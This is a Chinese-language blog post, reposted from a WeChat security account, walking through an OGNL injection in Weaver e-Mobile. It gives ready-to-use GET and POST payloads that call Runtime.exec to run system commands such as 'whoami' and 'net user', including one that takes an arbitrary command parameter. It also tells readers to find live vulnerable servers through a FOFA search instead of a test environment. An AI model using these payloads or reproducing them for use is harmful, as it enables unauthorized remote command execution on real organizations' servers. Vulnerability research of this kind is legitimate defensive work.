泛微e-Mobile ognl注入漏洞复现

admin 2022年5月29日14:24:38评论1,217 views字数 1085阅读3分37秒阅读模式

目标站点

www.xxx.com

漏洞危害

可直接执行系统命令。

漏洞复现

本来想搭建个测试环境,发现互联网上找不到相关环境,那就去FOFA上碰碰运气吧,搜索关键字app="泛微-EMobile"如果哪位师傅有测试环境或者实在搜不到的师傅的都可以在评论区留言。

泛微e-Mobile ognl注入漏洞复现

随意输入账号密码,错误提示104

泛微e-Mobile ognl注入漏洞复现

测试有没有注入

泛微e-Mobile ognl注入漏洞复现

很明显被带入计算了。

直接上poc

GET请求包poc

?message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())

泛微e-Mobile ognl注入漏洞复现

?message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('net user').getInputStream())

泛微e-Mobile ognl注入漏洞复现

POST请求包poc

burp抓取登录处的请求包然后转为POST请求包即可

message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

泛微e-Mobile ognl注入漏洞复现

message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=net user

泛微e-Mobile ognl注入漏洞复现


原文始发于微信公众号(赛瑞攻防实验室):泛微e-Mobile ognl注入漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月29日14:24:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微e-Mobile ognl注入漏洞复现http://cn-sec.com/archives/886881.html

发表评论

匿名网友 填写信息